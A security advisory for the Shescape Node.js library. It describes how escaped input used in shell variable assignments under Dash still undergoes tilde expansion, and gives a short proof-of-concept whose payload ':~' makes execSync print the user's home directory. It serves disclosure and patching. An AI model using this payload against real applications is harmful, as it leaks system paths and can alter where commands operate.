GHSA-q53c-4prm-w95q: Shescape: Home-directory disclosure in assignment context on Unix with Dash
This impacts users of Shescape on Unix systems that explicitly configure shell to Dash, or true when the default shell is Dash, using the escape and escapeAll APIs in assignments prefixed to a command.
An attacker may be able to obtain the location of the home directory and, depending on how it is used, change the location on which a command operates in unexpected ways.
import * as cp from "node:child_process";
import { Shescape } from "shescape";
// 1. Prerequisites
const options = {
shell: "dash",
// Or
shell: true, // Only if the default shell is Dash
};
// 2. Payload
const payload = ":~";
// 3. Usage
const shescape = new Shescape(options);
let escapedPayload;
escapedPayload = shescape.escape(payload);
// Or
escapedPayload = shescape.escapeAll([payload]);
// And (example)
const result = cp.execSync(`V=${escapedPayload}; echo $V`, options);
// 4. Impact
console.log(result.toString());
// Outputs ":" followed by the user's home directory
References
- github.com/advisories/GHSA-q53c-4prm-w95q
- github.com/ericcornelissen/shescape/blob/dea8893a5877893d8d4923dbf253080e08899e6d/docs/migration.md
- github.com/ericcornelissen/shescape/commit/43d70b59d09bbe5c3fd02ef08b3a123e977ed9de
- github.com/ericcornelissen/shescape/commit/b4b34c394e7f9da2775bb75381066b9a228c425f
- github.com/ericcornelissen/shescape/pull/2649
- github.com/ericcornelissen/shescape/pull/2651
- github.com/ericcornelissen/shescape/releases/tag/v2.1.14
- github.com/ericcornelissen/shescape/releases/tag/v3.0.1
- github.com/ericcornelissen/shescape/security/advisories/GHSA-q53c-4prm-w95q
Code Behaviors & Features
Detect and mitigate GHSA-q53c-4prm-w95q with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →